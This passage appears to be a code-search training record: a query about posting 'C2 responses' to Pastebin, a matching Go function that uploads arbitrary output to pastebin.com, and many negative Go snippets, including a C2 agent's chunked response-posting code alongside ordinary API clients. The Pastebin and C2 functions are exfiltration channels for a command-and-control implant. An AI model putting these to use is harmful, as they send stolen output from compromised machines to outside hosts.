{\n\t\t// None of the responders were available.\n\t\treturn nil, nil\n\t}\n\n\t// Similar to the stapled response case above, unconditionally call Update and it will either cache the response\n\t// or resolve conflicts if a different connection has cached a response since the previous call to Get.\n\treturn cfg.cache.Update(cfg.ocspRequest, externalResponse), nil\n}" ]
[ "0.63664776", "0.55832624", "0.5514464", "0.53296864", "0.53260106", "0.524355", "0.5235408", "0.52095276", "0.5203221", "0.5194358", "0.51923764", "0.51889634", "0.5168283", "0.51678956", "0.5162778", "0.5125504", "0.5118311", "0.51141155", "0.51028013", "0.5101454", "0.50955135", "0.5084443", "0.5077697", "0.5066547", "0.5059308", "0.50429356", "0.5040902", "0.50388217", "0.5031398", "0.50306386", "0.50181836", "0.5018016", "0.50144565", "0.5003795", "0.50008494", "0.4997399", "0.4980053", "0.49770558", "0.49705926", "0.49495548", "0.49476838", "0.49334824", "0.49289465", "0.4911055", "0.4909864", "0.4895373", "0.48922652", "0.4877341", "0.48771292", "0.48712257", "0.48704126", "0.48694408", "0.48681262", "0.4863711", "0.4837858", "0.48373842", "0.4834416", "0.48210788", "0.48196274", "0.48168185", "0.48125467", "0.4812305", "0.48120746", "0.48116586", "0.48074627", "0.48013657", "0.48004413", "0.4779027", "0.47781616", "0.4775708", "0.4772664", "0.47632372", "0.4762382", "0.47554564", "0.47518414", "0.47499958", "0.4748782", "0.47373676", "0.47284096", "0.4726828", "0.47236276", "0.47193578", "0.4716694", "0.47155538", "0.4714615", "0.47127512", "0.47100624", "0.47026744", "0.46978492", "0.46948928", "0.46925125", "0.46918154", "0.46871993", "0.46859717", "0.4685114", "0.4684421", "0.46842033", "0.46821773", "0.4681668", "0.46800587" ]
0.56600755
1
Function to handle Pastebin API Integration for posting C2 responses
func SendtoPB(output string) (int){ values := url.Values{} values.Set("api_dev_key", "") values.Set("api_option", "paste") values.Set("api_paste_code", output) values.Set("api_paste_name", "TEST") values.Set("api_paste_expire_date", "10M") response, err := http.PostForm("http://pastebin.com/api/api_post.php", values) defer response.Body.Close() if err != nil { //log.Fatalln(err) return 0 } if response.StatusCode != 200 { //log.Fatalln(response.StatusCode) return 0 } buf := bytes.Buffer{} _, err = buf.ReadFrom(response.Body) if err != nil { //log.Fatalln(err) return 0 } // Debugging Pastebin response // fmt.Println(buf.String()) return 0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func PostHandler(w http.ResponseWriter, r *http.Request) {\n\taccessKey := ReadAccessKey()\n\t// init client\n\tclient := &http.Client{}\n\t// get request body\n\treq, _ := http.NewRequest(r.Method, \"https://api2.autopilothq.com/v1/contact\", r.Body)\n\t// This part of code is for ease of test\n\tif len(r.Header.Get(\"autopilotapikey\")) == 0 {\n\t\treq.Header.Add(\"autopilotapikey\", accessKey)\n\t} else {\n\t\treq.Header.Add(\"autopilotapikey\", r.Header.Get(\"autopilotapikey\"))\n\t}\n\treq.Header.Add(\"Content-Type\", \"application/json\")\n\n\tres, err := client.Do(req)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tw.WriteHeader(res.StatusCode)\n\tb, err := ioutil.ReadAll(res.Body)\n\tw.Write(b)\n}", "func PostProcessResponse(w http.ResponseWriter, cdc *codec.Codec, response interface{}, indent bool) {\n\tvar output []byte\n\tswitch response.(type) {\n\tdefault:\n\t\tvar err error\n\t\tif indent {\n\t\t\toutput, err = cdc.MarshalJSONIndent(response, \"\", \" \")\n\t\t} else {\n\t\t\toutput, err = cdc.MarshalJSON(response)\n\t\t}\n\t\tif err != nil {\n\t\t\tWriteErrorResponse(w, http.StatusInternalServerError, err.Error())\n\t\t\treturn\n\t\t}\n\tcase []byte:\n\t\toutput = response.([]byte)\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.Write(output)\n}", "func (c *C2Default) postRESTResponse(urlEnding string, data []byte) []byte {\n\tsize := len(data)\n\tconst dataChunk = 512000 //Normal apfell chunk size\n\tr := bytes.NewBuffer(data)\n\tchunks := uint64(math.Ceil(float64(size) / dataChunk))\n\tvar retData bytes.Buffer\n\t//log.Println(\"Chunks: \", chunks)\n\tfor i := uint64(0); i < chunks; i++ {\n\t\tdataPart := int(math.Min(dataChunk, float64(int64(size)-int64(i*dataChunk))))\n\t\tdataBuffer := make([]byte, dataPart)\n\n\t\t_, err := r.Read(dataBuffer)\n\t\tif err != nil {\n\t\t\t//fmt.Sprintf(\"Error reading %s: %s\", err)\n\t\t\tbreak\n\t\t}\n\n\t\tresponseMsg := structs.TaskResponseMessage{}\n\t\tresponseMsg.Action = \"post_response\"\n\t\tresponseMsg.Responses = make([]json.RawMessage, 1)\n\t\tresponseMsg.Responses[0] = dataBuffer\n\n\t\tdataToSend, err := json.Marshal(responseMsg)\n\t\tif err != nil {\n\t\t\t//log.Printf(\"Error marshaling data for postRESTResponse: %s\", err.Error())\n\t\t\treturn make([]byte, 0)\n\t\t}\n\t\tret := c.htmlPostData(urlEnding, dataToSend)\n\t\tretData.Write(ret)\n\t}\n\n\treturn retData.Bytes()\n}", "func PostChainAPI(url string, payLoad []byte) (respBody string, respStatus string){\n\tif os.Getenv(\"NET_COMM_PROTOCOL\") == \"HTTPS\" || os.Getenv(\"NETWORK\") == \"Z\" {\n\t\trespBody, respStatus = PostChainAPI_HTTPS(url, payLoad)\n\t} else {\n\t\trespBody, respStatus = PostChainAPI_HTTP(url, payLoad)\n\t}\n\treturn respBody, respStatus\n}", "func Deposit2Channel(url string, Channel string, Balance int32) (Status string, err error) {\n\tvar resp *http.Response\n\tvar count int\n\tvar payload Desposit2ChannelPayload\n\tpayload.Balance = Balance\n\tp, _ := json.Marshal(payload)\n\tfor count = 0; count < MaxTry; count = count + 1 {\n\t\tclient := &http.Client{}\n\t\tfullurl := url + \"/api/1/channels/\" + Channel\n\t\treq, _ := http.NewRequest(http.MethodPatch, fullurl, bytes.NewReader(p))\n\t\treq.Header.Set(\"Content-Type\", \"application/json\")\n\t\treq.Header.Set(\"Cookie\", \"name=anny\")\n\t\tresp, err = client.Do(req)\n\t\t//body, err := ioutil.ReadAll(resp.Body)\n\t\tif err == nil {\n\t\t\tbreak\n\t\t}\n\t\ttime.Sleep(time.Second)\n\t}\n\tif count >= MaxTry {\n\t\tStatus = \"504 TimeOut\"\n\t} else {\n\t\tStatus = resp.Status\n\t}\n\tdefer func() {\n\t\tif resp != nil {\n\t\t\tresp.Body.Close()\n\t\t}\n\t}()\n\treturn\n}", "func cardTransactionI2C(context *Context, portConfig int, noResponse bool, reqJSON []byte) (rspJSON []byte, err error) {\n\t// Initialize timing parameters\n\tif RequestSegmentMaxLen < 0 {\n\t\tRequestSegmentMaxLen = CardRequestI2CSegmentMaxLen\n\t}\n\tif RequestSegmentDelayMs < 0 {\n\t\tRequestSegmentDelayMs = CardRequestI2CSegmentDelayMs\n\t}\n\n\t// Transmit the request in chunks, but also in segments so as not to overwhelm the notecard's interrupt buffers\n\tchunkoffset := 0\n\tjsonbufLen := len(reqJSON)\n\tsentInSegment := 0\n\tfor jsonbufLen > 0 {\n\t\tchunklen := CardI2CMax\n\t\tif jsonbufLen < chunklen {\n\t\t\tchunklen = jsonbufLen\n\t\t}\n\t\terr = i2cWriteBytes(reqJSON[chunkoffset:chunkoffset+chunklen], portConfig)\n\t\tif err != nil {\n\t\t\terr = fmt.Errorf(\"write error: %s %s\", err, note.ErrCardIo)\n\t\t\treturn\n\t\t}\n\t\tchunkoffset += chunklen\n\t\tjsonbufLen -= chunklen\n\t\tsentInSegment += chunklen\n\t\tif sentInSegment > RequestSegmentMaxLen {\n\t\t\tsentInSegment = 0\n\t\t\ttime.Sleep(time.Duration(RequestSegmentDelayMs) * time.Millisecond)\n\t\t}\n\t\ttime.Sleep(time.Duration(RequestSegmentDelayMs) * time.Millisecond)\n\t}\n\n\t// If no response, we're done\n\tif noResponse {\n\t\treturn\n\t}\n\n\t// Loop, building a reply buffer out of received chunks. We'll build the reply in the same\n\t// buffer we used to transmit, and will grow it as necessary.\n\tjsonbufLen = 0\n\treceivedNewline := false\n\tchunklen := 0\n\texpireSecs := 60\n\texpires := time.Now().Add(time.Duration(expireSecs) * time.Second)\n\tlongExpireSecs := 240\n\tlongexpires := time.Now().Add(time.Duration(longExpireSecs) * time.Second)\n\tfor {\n\n\t\t// Read the next chunk\n\t\treadbuf, available, err2 := i2cReadBytes(chunklen, portConfig)\n\t\tif err2 != nil {\n\t\t\terr = fmt.Errorf(\"read error: %s %s\", err2, note.ErrCardIo)\n\t\t\treturn\n\t\t}\n\n\t\t// Append to the JSON being accumulated\n\t\trspJSON = append(rspJSON, readbuf...)\n\t\treadlen := len(readbuf)\n\t\tjsonbufLen += readlen\n\n\t\t// If we received something, reset the expiration\n\t\tif readlen > 0 {\n\t\t\texpires = time.Now().Add(time.Duration(90) * time.Second)\n\t\t}\n\n\t\t// If the last byte of the chunk is \\n, chances are that we're done. However, just so\n\t\t// that we pull everything pending from the module, we only exit when we've received\n\t\t// a newline AND there's nothing left available from the module.\n\t\tif readlen > 0 && readbuf[readlen-1] == '\\n' {\n\t\t\treceivedNewline = true\n\t\t}\n\n\t\t// For the next iteration, reaad the min of what's available and what we're permitted to read\n\t\tchunklen = available\n\t\tif chunklen > CardI2CMax {\n\t\t\tchunklen = CardI2CMax\n\t\t}\n\n\t\t// If there's something available on the notecard for us to receive, do it\n\t\tif chunklen > 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\t// If there's nothing available and we received a newline, we're done\n\t\tif receivedNewline {\n\t\t\tbreak\n\t\t}\n\n\t\t// If we've timed out and nothing's available, exit\n\t\texpired := false\n\t\ttimeoutSecs := 0\n\t\tif !context.i2cMultiport || jsonbufLen == 0 {\n\t\t\texpired = time.Now().After(expires)\n\t\t\ttimeoutSecs = expireSecs\n\t\t} else {\n\t\t\texpired = time.Now().After(longexpires)\n\t\t\ttimeoutSecs = longExpireSecs\n\t\t}\n\t\tif expired {\n\t\t\terr = fmt.Errorf(\"transaction timeout (received %d bytes in %d secs) %s\", jsonbufLen, timeoutSecs, note.ErrCardIo+note.ErrTimeout)\n\t\t\treturn\n\t\t}\n\n\t}\n\n\t// Done\n\treturn\n}", "func (c *API) Post(URL, payload, signature string) (*http.Response, error) {\n\tbody := bytes.NewBuffer([]byte(payload))\n\n\treq, err := http.NewRequest(\"POST\", URL, body)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"coinone make request\")\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-COINONE-PAYLOAD\", payload)\n\treq.Header.Set(\"X-COINONE-SIGNATURE\", signature)\n\n\tresp, err := c.Client.Do(req)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"coinone post\")\n\t}\n\n\treturn resp, nil\n}", "func (api PayinvoiceAPI) Post(w http.ResponseWriter, r *http.Request) {\n\tvar reqBody types.PayinvoicePostReqBody\n\n\t// decode request\n\tif err := json.NewDecoder(r.Body).Decode(&reqBody); err != nil {\n\t\tw.WriteHeader(400)\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar respBody types.PayinvoicePostRespBody\n\tjson.NewEncoder(w).Encode(&respBody)\n}", "func (client HTTPSuccessClient) Post202Responder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func CreateBucket(w http.ResponseWriter, r *http.Request) *appError {\n decoder := json.NewDecoder(r.Body)\n var ecsBucket ECSBucket\n err := decoder.Decode(&ecsBucket)\n if err != nil {\n return &appError{err: err, status: http.StatusBadRequest, json: \"Can't decode JSON data\"}\n }\n headers := make(map[string][]string)\n if ecsBucket.ReplicationGroup != \"\" {\n headers[\"x-emc-vpool\"] = []string{ecsBucket.ReplicationGroup}\n }\n if ecsBucket.MetadataSearch != \"\" {\n headers[\"x-emc-metadata-search\"] = []string{ecsBucket.MetadataSearch}\n }\n if ecsBucket.EnableADO {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"false\"}\n }\n if ecsBucket.EnableFS {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableCompliance {\n headers[\"x-emc-compliance-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-compliance-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableEncryption {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"false\"}\n }\n retentionEnabled := false\n headers[\"x-emc-retention-period\"] = []string{\"0\"}\n if ecsBucket.Retention != \"\" {\n days, err := strconv.ParseInt(ecsBucket.Retention, 10, 64)\n if err == nil {\n if days > 0 {\n seconds := days * 24 * 3600\n headers[\"x-emc-retention-period\"] = []string{int64toString(seconds)}\n retentionEnabled = true\n }\n }\n }\n var expirationCurrentVersions int64\n expirationCurrentVersions = 0\n if ecsBucket.ExpirationCurrentVersions != \"\" {\n days, err := strconv.ParseInt(ecsBucket.ExpirationCurrentVersions, 10, 64)\n if err == nil {\n expirationCurrentVersions = days\n }\n }\n var expirationNonCurrentVersions int64\n expirationNonCurrentVersions = 0\n if ecsBucket.ExpirationNonCurrentVersions != \"\" {\n days, err := strconv.ParseInt(ecsBucket.ExpirationNonCurrentVersions, 10, 64)\n if err == nil && ecsBucket.EnableVersioning {\n expirationNonCurrentVersions = days\n }\n }\n var bucketCreateResponse Response\n if ecsBucket.Api == \"s3\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = s3Request(s3, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n versioningStatusOK := true\n lifecyclePolicyStatusOK := true\n // If the bucket has been created\n if bucketCreateResponse.Code == 200 {\n if !retentionEnabled && ecsBucket.EnableVersioning {\n // Enable versioning\n enableVersioningHeaders := map[string][]string{}\n enableVersioningHeaders[\"Content-Type\"] = []string{\"application/xml\"}\n versioningConfiguration := `\n <VersioningConfiguration xmlns=\"http://s3.amazonaws.com/doc/2006-03-01/\">\n <Status>Enabled</Status>\n <MfaDelete>Disabled</MfaDelete>\n </VersioningConfiguration>\n `\n enableVersioningResponse, _ := s3Request(s3, ecsBucket.Name, \"PUT\", \"/?versioning\", enableVersioningHeaders, versioningConfiguration)\n if enableVersioningResponse.Code != 200 {\n versioningStatusOK = false\n }\n }\n if expirationCurrentVersions > 0 || expirationNonCurrentVersions > 0 {\n lifecyclePolicyHeaders := map[string][]string{}\n lifecyclePolicyHeaders[\"Content-Type\"] = []string{\"application/xml\"}\n lifecyclePolicyConfiguration := `\n <LifecycleConfiguration>\n <Rule>\n <ID>expiration</ID>\n <Prefix></Prefix>\n <Status>Enabled</Status>\n `\n if expirationCurrentVersions > 0 && expirationNonCurrentVersions > 0 {\n // Enable expiration for both current and non current versions\n lifecyclePolicyConfiguration += \"<Expiration><Days>\" + ecsBucket.ExpirationCurrentVersions + \"</Days></Expiration>\"\n lifecyclePolicyConfiguration += \"<NoncurrentVersionExpiration><NoncurrentDays>\" + ecsBucket.ExpirationNonCurrentVersions + \"</NoncurrentDays></NoncurrentVersionExpiration>\"\n } else {\n if expirationCurrentVersions > 0 {\n // Enable expiration for current versions only\n lifecyclePolicyConfiguration += \"<Expiration><Days>\" + ecsBucket.ExpirationCurrentVersions + \"</Days></Expiration>\"\n }\n if expirationNonCurrentVersions > 0 {\n // Enable expiration for non current versions only\n // To fix a bug in ECS 3.0 where an expiration for non current version can't be set if there's no expiration set for current versions\n lifecyclePolicyConfiguration += \"<Expiration><Days>1000000</Days></Expiration>\"\n lifecyclePolicyConfiguration += \"<NoncurrentVersionExpiration><NoncurrentDays>\" + ecsBucket.ExpirationNonCurrentVersions + \"</NoncurrentDays></NoncurrentVersionExpiration>\"\n }\n }\n lifecyclePolicyConfiguration += `\n </Rule>\n </LifecycleConfiguration>\n `\n lifecyclePolicyResponse, _ := s3Request(s3, ecsBucket.Name, \"PUT\", \"/?lifecycle\", lifecyclePolicyHeaders, lifecyclePolicyConfiguration)\n if lifecyclePolicyResponse.Code != 200 {\n lifecyclePolicyStatusOK = false\n }\n }\n if versioningStatusOK && lifecyclePolicyStatusOK {\n rendering.JSON(w, http.StatusOK, \"\")\n } else {\n message := \"\"\n if !versioningStatusOK {\n message += \" Versioning can't be enabled.\"\n }\n if !lifecyclePolicyStatusOK {\n message += \" Expiration can't be set.\"\n }\n rendering.JSON(w, http.StatusOK, message)\n }\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"swift\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = swiftRequest(ecsBucket.Endpoint, s3.AccessKey, ecsBucket.Password, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"atmos\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = atmosRequest(ecsBucket.Endpoint, s3.AccessKey, s3.SecretKey, \"\", \"PUT\", \"/rest/subtenant\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: err.Error()}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, bucketCreateResponse.ResponseHeaders[\"Subtenantid\"][0])\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n }\n\n return nil\n}", "func (c *C2Default) PostResponse(output []byte, skipChunking bool) []byte {\n\tendpoint := fmt.Sprintf(\"api/v%s/agent_message\", ApiVersion)\n\tif !skipChunking {\n\t\treturn c.postRESTResponse(endpoint, output)\n\t} else {\n\t\treturn c.htmlPostData(endpoint, output)\n\t}\n\n}", "func (me *CHARGES_IMPL) CreateCharge (\r\n body *models_pkg.ChargesRequest1,\r\n idempotencyKey *string) (*models_pkg.ChargesResponse, error) {\r\n //the endpoint path uri\r\n _pathUrl := \"/Charges\"\r\n\r\n //variable to hold errors\r\n var err error = nil\r\n //the base uri for api requests\r\n _queryBuilder := configuration_pkg.BASEURI;\r\n\r\n //prepare query string for API call\r\n _queryBuilder = _queryBuilder + _pathUrl\r\n\r\n //validate and preprocess url\r\n _queryBuilder, err = apihelper_pkg.CleanUrl(_queryBuilder)\r\n if err != nil {\r\n //error in url validation or cleaning\r\n return nil, err\r\n }\r\n //prepare headers for the outgoing request\r\n headers := map[string]interface{} {\r\n \"user-agent\" : \"MundiSDK - Go 2.4.5\",\r\n \"accept\" : \"application/json\",\r\n \"content-type\" : \"application/json; charset=utf-8\",\r\n \"Content-Type\" : \"application/json\",\r\n \"idempotency-key\" : apihelper_pkg.ToString(idempotencyKey, \"\"),\r\n }\r\n\r\n //prepare API request\r\n _request := unirest.PostWithAuth(_queryBuilder, headers, body, me.config.BasicAuthUserName(), me.config.BasicAuthPassword())\r\n //and invoke the API call request to fetch the response\r\n _response, err := unirest.AsString(_request,false);\r\n if err != nil {\r\n //error in API invocation\r\n return nil, err\r\n }\r\n\r\n //error handling using HTTP status codes\r\n if (_response.Code == 400) {\r\n err = apihelper_pkg.NewAPIError(\"Invalid request\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 401) {\r\n err = apihelper_pkg.NewAPIError(\"Invalid API key\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 404) {\r\n err = apihelper_pkg.NewAPIError(\"An informed resource was not found\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 412) {\r\n err = apihelper_pkg.NewAPIError(\"Business validation error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 422) {\r\n err = apihelper_pkg.NewAPIError(\"Contract validation error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 500) {\r\n err = apihelper_pkg.NewAPIError(\"Internal server error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code < 200) || (_response.Code > 206) { //[200,206] = HTTP OK\r\n err = apihelper_pkg.NewAPIError(\"HTTP Response Not OK\", _response.Code, _response.RawBody)\r\n }\r\n if(err != nil) {\r\n //error detected in status code validation\r\n return nil, err\r\n }\r\n\r\n //returning the response\r\n var retVal *models_pkg.ChargesResponse = &models_pkg.ChargesResponse{}\r\n err = json.Unmarshal(_response.RawBody, &retVal)\r\n\r\n if err != nil {\r\n //error in parsing\r\n return nil, err\r\n }\r\n return retVal, nil\r\n\r\n}", "func (m *Mpesa) B2CRequest(b2c B2CRequestBody) (*MpesaResult, error) {\n\tif b2c.CommandID == \"\" {\n\n\t\tb2c.CommandID = BusinessPayment\n\t}\n\n\treturn m.sendAndProcessMpesaRequest(\"https://api.safaricom.co.ke/mpesa/b2c/v1/paymentrequest\", b2c, nil)\n\n}", "func bungieCallback(c *gin.Context) {\n code := c.Query(\"code\")\n state := c.Query(\"state\")\n\n // Now use the code to receive an access token\n client := &http.Client{}\n data := url.Values{}\n data.Set(\"grant_type\", \"authorization_code\")\n data.Set(\"code\", code)\n req, _ := http.NewRequest(\"POST\", \"https://www.bungie.net/platform/app/oauth/token/\", strings.NewReader(data.Encode()))\n req.Header.Add(\"Authorization\", \"Basic \" + base64.StdEncoding.EncodeToString([]byte(os.Getenv(\"CLIENT_ID\") + \":\" + os.Getenv(\"CLIENT_SECRET\"))))\n req.Header.Add(\"Content-Type\", \"application/x-www-form-urlencoded\")\n resp, _ := client.Do(req)\n\n // Assess GetToken Response Code\n if resp.StatusCode == http.StatusOK {\n var tokenResponse TokenResponse\n // This could potentialy be changed to use unmarshalling to save memory\n err := json.NewDecoder(resp.Body).Decode(&tokenResponse)\n // err := json.Unmarshal(resp.Body, &tokenResponse)\n resp.Body.Close()\n if err != nil {\n fmt.Println(err)\n }\n\n deleteUser(state)\n\n // Collect the available destiny membership id(s) as an array\n req, _ = http.NewRequest(\"GET\", \"https://www.bungie.net/platform/User/GetBungieAccount/\" + tokenResponse.Membership_id + \"/254/\", nil)\n req.Header.Add(\"X-API-Key\", os.Getenv(\"API_KEY\"))\n resp, _ = client.Do(req)\n\n // Assess GetBungieAccount Response Code\n if resp.StatusCode == http.StatusOK {\n destinyMemberships := make([]Membership, 0)\n\n // Determine which Destiny membership IDs are associated with the Bungie account\n var accountResponse interface{}\n err = json.NewDecoder(resp.Body).Decode(&accountResponse)\n resp.Body.Close()\n\n accountMap := accountResponse.(map[string]interface{})\n responseMap := accountMap[\"Response\"].(map[string]interface{})\n destinyMembershipsArray := responseMap[\"destinyMemberships\"].([]interface{})\n\n activeMembership := \"-1\"\n for _, u := range destinyMembershipsArray {\n valuesMap := u.(map[string]interface{})\n\n\n //////\n ////\n //// For now, we assume PC is the active membership\n activeMembershipType := valuesMap[\"membershipType\"].(float64)\n if ( activeMembershipType == 3 ) {\n activeMembership = valuesMap[\"membershipId\"].(string)\n fmt.Println( \"Active Membership: \" + valuesMap[\"displayName\"].(string) )\n }\n //// Replace with getActiveMembership() implementation\n ////\n //////\n\n\n tmpMembership := Membership{activeMembershipType, valuesMap[\"membershipId\"].(string)}\n destinyMemberships = append(destinyMemberships, tmpMembership)\n }\n\n // Empty User Values\n loadouts := make([]Loadout, 0)\n\n // Insert new user entry\n newUser := User{loadouts, destinyMemberships, state, activeMembership, \"-1\", tokenResponse.Access_token, tokenResponse.Refresh_token}\n createUser(newUser)\n } else {\n // Error in GetBungieAccount\n fmt.Println(resp.StatusCode)\n }\n\n } else {\n // Error in GetTokenResponse\n fmt.Println(resp.StatusCode)\n }\n}", "func (client HTTPSuccessClient) Post200Responder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (a *Client) CreateEntitlementUsingPOST2(params *CreateEntitlementUsingPOST2Params, opts ...ClientOption) (*CreateEntitlementUsingPOST2OK, *CreateEntitlementUsingPOST2Created, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewCreateEntitlementUsingPOST2Params()\n\t}\n\top := &runtime.ClientOperation{\n\t\tID: \"createEntitlementUsingPOST_2\",\n\t\tMethod: \"POST\",\n\t\tPathPattern: \"/catalog/api/admin/entitlements\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &CreateEntitlementUsingPOST2Reader{formats: a.formats},\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t}\n\tfor _, opt := range opts {\n\t\topt(op)\n\t}\n\n\tresult, err := a.transport.Submit(op)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tswitch value := result.(type) {\n\tcase *CreateEntitlementUsingPOST2OK:\n\t\treturn value, nil, nil\n\tcase *CreateEntitlementUsingPOST2Created:\n\t\treturn nil, value, nil\n\t}\n\t// safeguard: normally, absent a default response, unknown success responses return an error above: so this is a codegen issue\n\tmsg := fmt.Sprintf(\"unexpected success response for catalog_entitlements: API contract not enforced by server. Client expected to get an error, but got: %T\", result)\n\tpanic(msg)\n}", "func (rest *RESTService) ApiPOST(w http.ResponseWriter, r *http.Request) {\n\n}", "func (a *AmsiApiService) SubPOST(ctx context.Context, body InlineSubscription) (InlineSubscription, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Post\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue InlineSubscription\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/subscriptions\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &body\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode < 300 {\n\t\t// If we succeed, return the data, otherwise pass on to decode error.\n\t\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\tif err == nil {\n\t\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t\t}\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericSwaggerError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 201 {\n\t\t\tvar v InlineSubscription\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 400 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 401 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = 